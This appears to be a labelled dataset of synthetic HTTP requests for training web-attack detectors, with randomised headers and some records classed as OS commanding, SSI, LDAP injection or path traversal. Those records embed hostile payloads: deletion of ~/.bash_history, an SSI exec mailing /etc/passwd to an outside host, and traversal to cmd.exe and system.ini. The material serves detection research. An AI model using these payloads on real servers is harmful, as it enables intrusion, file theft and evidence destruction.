Accept-Encoding: gzip;q=0.8, compress;q=0.0, deflate;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 21.72.18.201
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="9"
Date: Thu, 23 Jul 09 15:02:21 GMT
ETag: W/"m4CjLAtP7IC3FCI0_aT"
Expect: 100-continue
From: hoiiT@iran.org
If-Modified-Since: Tue, 16 Feb 10 22:03:23 GMT
If-Unmodified-Since: Sat, 29 Dec 07 18:40:24 CET
If-Match: "k-roh14x7XESU7Yv_Dp"
If-None-Match: "PD.skZUeT7Or4@AmhiY"
If-Range: Fri, 16 Oct 09 08:29:45 CET
Max-Forwards: 17
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=CdFcC4cf
Range: 2506-
Referer: http://www.eSnaa.net/rt4ktst7.sh
TE: deflate
Trailer: Referer
User-Agent: hQSovl_GX http://www.tli6q.st
UA-CPU: PowerPC
UA-Disp: 0437,4015,8
UA-OS: Win9x
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: identity
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 429 245.130.187.92 "yektIqaee5r3rxhg" "Tue, 26 Jun 07 17:05:12 GMT"
X-Forwarded-For: 162.29.213.245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1770
Start - Id: 43605
class: OsCommanding
GET /hDvnswkPLIWW7fHhoMr.mspx?uk=aiebd&dot8utensEt=n3heinullzboot.iniieim%3C%24eOa+&s2Scomtool=%27+++++%3B+++++rm++++%7E%2F.bash_history+++%3B&le=405&oy=rVbqKM-&aiwfblewma=brcteaheus&eii=6603508412 HTTP/1.1
Host: 144.91.81.154
Connection: lluhmt
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip, deflate, compress
Accept-Language: a-naib;q=0.9, wkYTqpah-yi1rai8;q=0.3, n-yhhoau;q=0.9
Cookie: uprh=btzws;Fo3Asew1haal=seaiexp_Xih ;behmbdoNry=13364;4cdjWzuNwp-0dKT=\openunioneetckha;n6pe=rE';uaulnarj=692905
Date: Mon, 22 Feb 10 11:17:53 CET
If-Modified-Since: Sat, 13 Mar 10 02:12:43 GMT
Max-Forwards: 983
Pragma: no-cache
Proxy-Authorization: Basic eWFkc1NzOmdhZnI2aWo=
Referer: /9ia4ttd4/aaifel.txt
User-Agent: Swmc3tapix/4.7.5.0
UA-OS: WinNT
Transfer-Encoding: 5dixe; amkh=sqfr
Warning: 620 www.06ano.htm "iiynpf86soiMxo16ite" "Mon, 27 Dec 04 23:11:25 UTC"
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 43605
Start - Id: 32769
class: Valid
PUT /snavretSeaof/acx2nb9q/lpie9ii2smpaiwsnpdmt/t.Q11Q_tXvm7o_k.gif? HTTP/1.0
Content-Length: 33
Content-Language: g
Content-Encoding: compress
Content-Location: http://www.nnr3Ote.org/Wnekel2.tar.gz
Content-MD5: ZnNlaHVjZWRUb29sZm9hcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Mar 06 10:52:07 CET
Last-Modified: Thu, 11 Jan 07 23:23:06 GMT
Host: www.lmtse.gov
Connection: keep-alive
Accept: image/png;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 68.202.181.199
Cookie: 8Jhc=ijhoOeho;gh8eofhn=siulrDoseoenepocdn;eojc26eotrlip=7802963;pd5kjsijigla2rE=godm;ehLtEs=n4idhA
Cookie2: $Version="561"
Date: Thu, 21 Apr 05 18:57:05 UTC
ETag: "iZ8m4dCHifFiyoUCsppk"
Expect: poeint
From: eadg@itnjs.uk
If-Modified-Since: Thu, 14 Feb 08 07:01:35 GMT
If-Unmodified-Since: Mon, 30 Mar 09 06:43:42 UTC
If-Match: *
If-None-Match: "PgEE45nfhz3fJoR"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: Digest algorithm=MD5
Range: 7780-1621,55-
Referer: http://mncaeS.de/s1ae/ehdnxh/erea/sesrit.gif
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 5.2; n5-Ss; rv:6.3.4) Gecko/20996429
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4217x4135
Via: 0.1 www.pdz0l.js, FTP/7.9 www.6old.tiff:5, 6.8 74.124.83.220
Transfer-Encoding: identity
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

msaeZ5Snta=f'&ey7dnlaD=27157248

End - Id: 32769
Start - Id: 39028
class: LdapInjection
POST /4qc/zp8hsosdeasEae/ehGeXE1Xoy/nshui.mspx? HTTP/1.0
Content-Length: 266
Content-Language: poyee,jnE2sulA,m0C0as
Content-Encoding: gzip
Content-Location: http://iiGnm.org/6jiznrS/ejUdgmr/ah6eerlo/atLro/5IARl.pl
Content-MD5: dXlueUVpdHF0aGVEejJ5bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 04 13:37:02 UTC
Last-Modified: Wed, 06 Oct 04 20:32:43 CET
Host: www.ewed0.biz
Connection: keep-alive
Accept: image/*, audio/x-wav, application/*
Accept-Charset: iso-8859-6;q=0.9, x-mac-ce;q=0.6
Accept-Encoding: )    ( |   (displayName=had*)    (name    =  had*)(mail=had*   )
Accept-Language: )(   |  (n0naa=twh*)
Cache-Control: only-if-cached
Client-ip: 42.170.193.199
Cookie: wysiphe7wa4ee=ylcw poM  copy4eaemtdz ;Rnsndnh=96300268;1h6lN9TeA=atwFcattep;hrccd1nRfmlwnn=1cene6ntiottu
Cookie2: $Version="35"
Date: Mon, 02 Jan 06 10:41:39 GMT
ETag: "iLW@6vsQxq499o6Y"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Mon, 16 Jun 08 13:36:23 CET
If-Unmodified-Since: Sun, 30 Jul 06 08:56:36 CET
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Sun, 13 Nov 05 08:54:20 CET
Max-Forwards: 2890
MIME-Version: 9.1
Pragma: no-cache
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Range: -579,653398-
Referer: /hOqolnU/varaBD5.rar
TE: chunked;q=0.7,gzip,trailers
Trailer: Authorization
User-Agent: asDYaynmfy (iCiUrXxgkS; lj-.eeH-b)
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7332x461
Via: HTTP/8.0 221.92.206.72, HTTP/4.6 www.hlnWr.jpeg, 2.0 www.ocumt.htm
Transfer-Encoding: deflate
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -------------------
~~~~~: ~~~~~~~~~~~

itatg4lti=window.openScmd9y&rtitttm9EeaE=99&c3ntqT=accepttb&lItSaeee=hh&Hrfn8mw=a2hkireeiilna&peefedi4ro=tep&lR8huoBXepw5oI=~4passwdei6rrhdt7o&DWinsertDform=peaiyeodhTkx&oen9saohNd=e%re%eaduu=0+Reehx8o&snoa5zLe2=we2y&onmtlEto=7499967557&@zLnQ6iAecho=yLEKA3

End - Id: 39028
Start - Id: 29556
class: Valid
GET /lPKI.pl?Po=o2c%40Tlcrm6zR&fXYOnc.oVA2=n8ehLr HTTP/1.1
Host: www.escybYbcd.gov
Connection: uyeatnge
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity
Accept-Language: oeem-ry3tE
Cache-Control: no-cache
Client-ip: 102.82.97.165
Cookie: ad7tptr=ah7cm;8iwcEpeip8uThi=4711;iclShRxxbb0efUI=tD9Y9x;qiLfPAjj2winntwget@=535;san2=078361
Cookie2: $Version="7"
Date: Mon, 10 Jul 06 23:21:08 UTC
ETag: "A0dDcLhD9J7yLp1qFBp"
Expect: pceel=iyo3br
From: rain@uiqt.com
If-Modified-Since: Thu, 18 Aug 05 06:25:48 CET
If-Unmodified-Since: Wed, 14 Dec 05 09:01:42 CET
If-Match: *
If-None-Match: "v5K8VkPficRAgTb"
If-Range: "gAfXXgawctxUO.-CuV"
Max-Forwards: 4
MIME-Version: 6.1
Pragma: teja8tr=ztsIi
Proxy-Authorization: NTLM dHZ1YWRsbHI4ZWFzbGFzb21peTRuUG9uT2VvZGNkcmRwdEZlaDI5b0ViYWFpZDg=
Authorization: yeuks m62y1hqk=polh
Range: 769081-,036-,28554-934721
Referer: http://qfNse6.net/mibert/nhnscnOv/aepr/7qflt/diotb.pl
TE: trailers,deflate
Trailer: Upgrade
User-Agent: scpJbrJu http://www.tEcee7.st
UA-CPU: 68000
UA-Disp: 416,1286,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3909x9569
Via: 7.7 www.ndcua6w.tiff
Transfer-Encoding: deflate
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 558 146.172.197.186 "htho6nhe24inCd" "Thu, 18 Aug 05 11:14:29 CET"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 97266154050
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29556
Start - Id: 40137
class: SSI
GET /fX1rUGPF5LVpG6Mf8.js?Oioefdgp=is&hotaid5sdowaoeq=a9Id71Q&dc=qabssrT&tbJx=eH%40E9jvbQFO2&lttac=iS5nacptt+0%3Bok%5C%24&eda=easrsd7ei1Ra&qrzsI-JCTa=iid32oopegii&dses=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fmail++4ibieeyM.com+++%3C++%2Fetc%2Fpasswd%22--%3E&nmncFanfyk=7h&Tx=8&cwnefdmyeepqdld=840302 HTTP/1.1
Host: www.Suis.biz
Connection: a6kstc0
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese, windows-1251;q=0.9
Accept-Encoding: *
Accept-Language: noatlesm-2RDeem, s6yor-dsgee, iee6ma-c;q=0.4, tni2bi1-ets72t
Cache-Control: no-cache
Client-ip: 246.182.239.2
Cookie: tWr1hnnaoit=tHW5j
Cookie2: $Version="8"
Date: Sat, 17 Sep 05 19:57:26 CET
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: hthq3df@t0rsnSoda.org
If-Modified-Since: Fri, 17 Dec 04 11:32:53 UTC
If-Unmodified-Since: Thu, 16 Mar 06 17:51:19 CET
If-Match: *
If-None-Match: *
If-Range: "mm@ggSt23lVZv6kDQ_"
Max-Forwards: 3
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: Basic Y2VhQ3R0djpzZGVFc2M=
Range: 86-29827,480182-539278,773981-8539
Referer: http://he2i.it/tiie/gthja.swf
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: Mozilla/6.2 (X11; U; Solaris 8.5; cq-6H; rv:8.0.9) Gecko/02196252
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40137
Start - Id: 44277
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 70.220.254.142
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 192.246.21.91
Cookie: ecoeHj1meanixs=2sOitahdqnmsSgu;rreeobNf=fabpl;vlaoeasifrNtliY=2386;nye=117064666;efod=nhmE90;i7co=61407809
Cookie2: $Version="864"
Date: Mon, 02 Aug 04 18:51:59 CET
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Mon, 24 Aug 09 21:58:19 UTC
If-Match: "fX3vv9nhjLUGEf3"
If-None-Match: *
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 15
MIME-Version: 6.9
Pragma: tdrp=f
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic dHNjdDo2N2R3bnJl
Range: 1630-9,-816
Referer: http://Seu4t.biz/eoeiaee/ouaero/nneons/5vhet.sh
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: 7t4tSGte http://www.fXen.it
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: igk9/5.4 www.6gaSer.htm, 9.8 5.18.32.190, chpde/5.9 134.151.163.153
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44277
Start - Id: 18368
class: Valid
GET /thp9t0fmepaEo6i4/tgGy/sNucnlzd8zniGpni3/ae48HJUzbarb.swf?enkwg=hqNwUWUR5&piHONhlcseedqdd=15232&taorxAeu=nnigupdate+reabp%25htd HTTP/1.1
Host: www.drke1.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-cn, hz-gb-2312
Accept-Encoding: deflate;q=0.4, gzip;q=0.7, deflate
Accept-Language: sisiiinb-Aedn, no6-da
Cache-Control: eiW='f'
Client-ip: 158.59.108.24
Cookie: 2php6wherej8optK=rDbEMmY;uAFr=497;oruostty=sdxnwnigdFcoiframeobjecti;t1tnsnnekz7rym=18;slsrqy=2;seqMe=0sercpets7
Cookie2: $Version="08"
Date: Mon, 21 Apr 08 09:46:50 GMT
ETag: "0S7dbJo4o4@3TRbEvsJ9"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 29 Nov 09 08:58:45 UTC
If-Unmodified-Since: Tue, 14 Apr 09 22:22:14 CET
If-Match: "3eXYoqZ2UmnUAjhu"
If-None-Match: "Hl3FJsPnhEx.NPvbR"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM V295cmVUZWlVdDNhdWNnbE9Fd3JmZ2Vkc2RhQ2VjOGRlanJvbXRydGE4aXNmbg==
Range: -93,1-996180
Referer: http://www.adtnh.st/hoer.mspx
TE: deflate;q=0.0,trailers
Trailer: If-Match
User-Agent: irta (2K6C6Er)
UA-CPU: x86
UA-Disp: 452,8652,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0744x394
Via: 9.9 www.tinves.png
Transfer-Encoding: identity
Upgrade: yall3l/4.3, iae/4.2, Pto/9.7, 2de/8.3
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 45.200.167.86
X-Serial-Number: 185669982950
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18368
Start - Id: 33413
class: Valid
POST /cnowsdsd/m7A_/ew_o7sv4mpBVdI2Vep/t3SAU@Zb5/eanzIwqngu/ies.jsp? HTTP/1.1
Content-Length: 224
Content-Language: ece,nri,rdlocylo
Content-Encoding: identity
Content-Location: /tNlnb/eauc/eReqt2/oaie.html
Content-MD5: d01kckVuc2RnaG1pbjRlTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Feb 06 11:06:06 CET
Last-Modified: Sun, 18 Dec 05 08:28:02 UTC
Host: 133.251.164.29
Connection: keep-alive
Accept: video/mpeg;q=0.6, video/*, image/*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.7, iso-8859-1;q=0.1, iso-8859-2, x-mac-arabic, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 176.30.127.43
Cookie: uEqepl=1043347;6rlavs8=evalcatua;hgiiinvdl=65;5wkaidaaast==Eiw
Cookie2: $Version="47"
Date: Thu, 30 Jun 05 17:17:09 UTC
ETag: W/"60IDLh3ofRYVDqXC"
Expect: ityaa6uE=7efl
From: ooydtlh@tuohEicue.de
If-Modified-Since: Mon, 29 Mar 10 01:59:40 GMT
If-Unmodified-Since: Wed, 25 Feb 09 06:46:23 GMT
If-Match: *
If-None-Match: "SDOpK3POyn.opFqovI"
If-Range: Wed, 17 Sep 08 12:18:43 UTC
Max-Forwards: 5
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: nu9hs uajtVt=hdo1
Authorization: Basic bVJmM0k6ZXhvZ2EzbzI=
Range: -45727
Referer: /fnemicrh/taFnE.tar
TE: gzip
Trailer: If-Range
User-Agent: tsucrda
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: HTTP/8.8 www.falso7hs.tiff
Transfer-Encoding: deflate
Upgrade: lgrd4/0.7, r3p/6.7, la3e/8.5
Warning: 647 164.77.60.132 "hnhznlfessi6tA" "Sun, 14 Feb 10 03:58:44 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

lnjcefIe=9cieO&Bhuwp-eEWi9NBN=cGFSs&tdRiahnpr0er=eRestvsonta&aheIioeo=12&jTU2=EZhsrQ&hAegIi0hn=863&n0hrDaog1b=015542&nadcxwc=atiedltmdsan2h&aaehy=04589&9eoniska=nnhynesdeirhaiUje&Ibgsoundopenepasswdss3CexP=qnesesrm&l1@2R1=ih

End - Id: 33413
Start - Id: 45881
class: PathTransversal
GET /6egrrbq/aOaer5b1Eytho8dm/ystupegalh9bCrlt/szrwiaaYbttwrhnhsm/i_JsdH7CbuCYZeX-WF/tnbeyi3rwyclsitj/eoCNVw8zRp3DzDD7/zQ4/7wlt7seeoa8ayo/CWlhThAmi7ntweu/tidiu0Ntraasft.asp?njKe=%5CWINDOWS%5Csystem.ini&hSsoheeI=iO.Dm&upo=baaiN%2Boiiecua&4vSae4tdeotbecw=egN&uxem=8zE8G&ain6tbEe=353161 HTTP/1.1
Host: www.ymlahoSln.org
Connection: close
Accept: video/*, audio/*, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 14.151.219.100
Cookie: 1uBUYc7GNpasswd=45;XN7XW9VLgd=suN
Cookie2: $Version="086"
Date: Fri, 10 Apr 09 16:46:11 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: erymey@jq6fn.org
If-Modified-Since: Wed, 30 Jan 08 10:42:31 GMT
If-Unmodified-Since: Sun, 18 Feb 07 09:01:23 GMT
If-Match: "6ZoJKPLkFBZhBOd"
If-None-Match: "qZLqsf_XzXQ2Lx0HeB"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.2
Pragma: uaouZ=avS
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: http://www.6eoEm.com/edtuoEu/eityycx/8ocmeom.conf
TE: trailers
Trailer: If-Modified-Since
User-Agent: enhniqa1sDr2r
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: FTP/1.9 www.dktki.jpg:0975, sain7/2.3 219.228.23.235, 2.1 www.ethR.htm
Transfer-Encoding: pqirj
Upgrade: mtIo/0.5, wlN/3.9
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 9205115584869
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45881
Start - Id: 9689
class: Valid
GET /sv/WC3fJ/Abhuhlhtlfhkzer/vbscriptltP/op/uR.html?iteEsoo=eeratsc%27tweaas&hk=s&hnu1o=51&mslssOz0l=Ncg&usr-nciLmW=ainutdtutsinRO&ziDe1rl=Lj3e&eiuGaheez=%7E%25ta%3EiEtpeidobjectanSs HTTP/1.1
Host: www.EntNa.biz
Connection: keep-alive
Accept: application/postscript
Accept-Charset: iso-2022-jp, cp-936;q=0.8, euc-jp
Accept-Encoding: gzip;q=0.3
Accept-Language: j7nu-lst7a;q=0.5, ilof-hlynct;q=0.3, macsw-cayaTh, llhLitss-dhrso, re-h;q=0.1
Cache-Control: no-store
Client-ip: 91.244.100.7
Cookie: Ynccrciwdc=30289;eto=a.7
Cookie2: $Version="0"
Date: Tue, 08 Mar 05 09:28:04 UTC
ETag: W/"7-bwmdAwrAU_eiuFRQ0"
Expect: a6ne2bi=lomue
From: ueOaee@eeftsat.ch
If-Modified-Since: Thu, 10 Apr 08 14:30:23 GMT
If-Unmodified-Since: Fri, 20 Oct 06 18:07:19 CET
If-Match: "51VodH_HSCgZ9kg3fCkP"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.8
Pragma: eqozD='lpvgIRe'
Proxy-Authorization: Basic ZXRyYWhybzQ6cGc0MGVmZQ==
Authorization: egie etel0rns=5ieeuron
Range: -03,46238-,778-
Referer: http://0dtRm.biz/anhur/ki1eLnO.php
TE: trailers,chunked
Trailer: Accept
User-Agent: shtnrc7tpo3
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 669x055
Via: FTP/5.5 4.133.166.105, 0.0 www.3ohS.png
Transfer-Encoding: gzip
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 376 www.wu1w.htm:846 "serteri" "Tue, 11 Dec 07 19:12:50 GMT"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 66630290652
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9689
Start - Id: 21301
class: Valid
GET /Ru/CuUon/2a32e4ristaNd6ehodh4/e4./replace8W_WE-ih1/s_6P91TR2W8.jpeg?oa=rmut%2F&zsNioeebty=enrelocationnnmvst HTTP/1.0
Host: www.snexhnysi.uk
Connection: keep-alive
Accept: text/*;q=0.4, text/*;q=0.2
Accept-Charset: iso-8859-3, windows-1258;q=0.8, cp-950, iso-8859-4;q=0.5
Accept-Encoding: gzip
Accept-Language: seOonix-to;q=0.6
Cache-Control: u='seii7mt'
Client-ip: 244.23.171.252
Cookie: lriqssgd=unionQdl/ng 
Cookie2: $Version="793"
Date: Wed, 14 Apr 04 06:08:32 GMT
ETag: "TGlCpO2QRbtWoKg"
Expect: 100-continue
From: nsgt@tyrb.fr
If-Modified-Since: Wed, 18 Oct 06 20:26:18 GMT
If-Unmodified-Since: Mon, 12 Jul 04 14:49:05 GMT
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: *
If-Range: Thu, 01 Jan 09 16:52:51 GMT
Max-Forwards: 802
MIME-Version: 3.2
Pragma: t9d6oa=DdFtscu
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: dnmtt aieee4A=oegr
Range: 863-
Referer: http://www.sthatze.biz/EicEer/yeSdEao/oeaati/ttlmsih.tiff
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: eqS7RFnL http://www.yE1ybO1.it
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6998x4175
Via: 3.3 37.64.192.90
Transfer-Encoding: deflate
Upgrade: oSii/2.9, rhi/9.2, rNil/2.3, sIri5t/1.2, seoE7t/2.4
Warning: 749 www.en5tssls.jpg "nqn0" "Mon, 30 Aug 04 15:46:19 UTC"
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 900444
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21301
Start - Id: 13272
class: Valid
GET /aa6i0TncSrrOasluo/izrG7yAnKtUlooE/lYLb_HUZP@Cyblu/eotKWw-xe.1L0/erGwpBs7/Dt/uI_rGbGVUYR/lKxpM4nVTXf/lHz.M1ulocationN/4fypSL43.k/V9/aCbZRvYOkyM6R_B6.dll? HTTP/1.1
Host: www.eincols.gov:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.6, koi8;q=0.3
Accept-Encoding: *
Accept-Language: 1etyeerE-oboo;q=0.0, Er-mdop, iOxil-hpd, wmjie-tdu;q=0.2, r-ec0a;q=0.8
Cache-Control: only-if-cached
Client-ip: 181.206.52.199
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="23"
Date: Tue, 01 Apr 08 08:01:36 CET
ETag: W/"_U7Dq7FF1JXRYJzpS3j"
Expect: 100-continue
From: ag2teao@l2Dusietlt.org
If-Modified-Since: Fri, 23 Oct 09 16:11:07 GMT
If-Unmodified-Since: Sat, 10 Nov 07 13:22:46 UTC
If-Match: "zuxH7cHuKjMpfgj"
If-None-Match: "pCMpUulJLjQyNQWxJpeC"
If-Range: *
Max-Forwards: 7341
MIME-Version: 0.5
Pragma: ol2=e3ananhu
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="Nshamds"
Range: 219-
Referer: http://kr8Esoii.cz/atsqsa/44wgddoi/6g7qAe.jpg
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 1.3; as-3i; rv:2.5.6) Gecko/83964624
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: 9.5 www.lseAwpe.htm:0
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13272
Start - Id: 11434
class: Valid
GET /peo/hbst2lrnea/3mIfsolc5mw9SUtn/bU77JXxFm/goil7fvlb/zmAft9WXF/hr8qCenkehdsehftge/rwln1/JC4W/b1bBe3Xw.VjVztWQZK4Z.gif?eeshg=977647752&ectHen=tarsdgo5sqq&IK-3rtDOwF=6o3homWpaysr&zsrxnb=cMODf&pwrw6rz5ec=8b&0rao=4205&tnbortc3rsfEs=+a%3Ac+&omo8OteOor4=iuresNl HTTP/1.1
Host: 49.31.202.147
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-5, x-mac-greek, x-mac-ce
Accept-Encoding: gzip, gzip;q=0.0, gzip;q=0.8, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 212.244.209.81
Cookie: 2ie=sFghKO;tiotusttisi=5209
Cookie2: $Version="19"
Date: Thu, 24 Jul 08 13:30:54 CET
ETag: "cTTUJSSOB0PiimHNlpk"
Expect: 100-continue
From: Nfte6@rmtsm.be
If-Modified-Since: Thu, 23 Mar 06 06:58:06 GMT
If-Unmodified-Since: Tue, 16 Jun 09 08:33:53 GMT
If-Match: "ALhIBXrpM6PZ0nQnGm"
If-None-Match: *
If-Range: Mon, 31 Mar 08 02:47:26 GMT
Max-Forwards: 7
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: u68si atohazra=reig
Authorization: armg lT5rro=sGeocoO
Range: 17-873364,-1915
Referer: http://www.hlVrcsui.fr/eeeBjhl/oTtp/qwsVis.wmn
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/9.7 (compatible; aaaof; Win98; edtein; wityuoaten)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1385x852
Via: FTP/2.0 www.hde8tr.shtml, 3.4 www.eaaieatn.tiff
Transfer-Encoding: gzip
Upgrade: AArn2t/8.5, Ccza/1.6, hDt/3.7, e9H/6.2, ghti/3.0
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11434
Start - Id: 12958
class: Valid
GET /uLtfmmgi6aurk.html?xl0rieoa=dj&haEtoea0v=tE3h9DXb&uegtlrl=5714838333&rs=3Dte%7Epshhtaccesaw6CsiV%5D&gefoi=S7cTillnerreudw&pneoeteuqm=aTPZ1aNE8SnD&2tmpkY-XgNabA=%27rffoMneagrpxtautoexecaapositionftps&dTe=605&goatsn=Blstr HTTP/1.0
Host: www.ahcnstaa.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
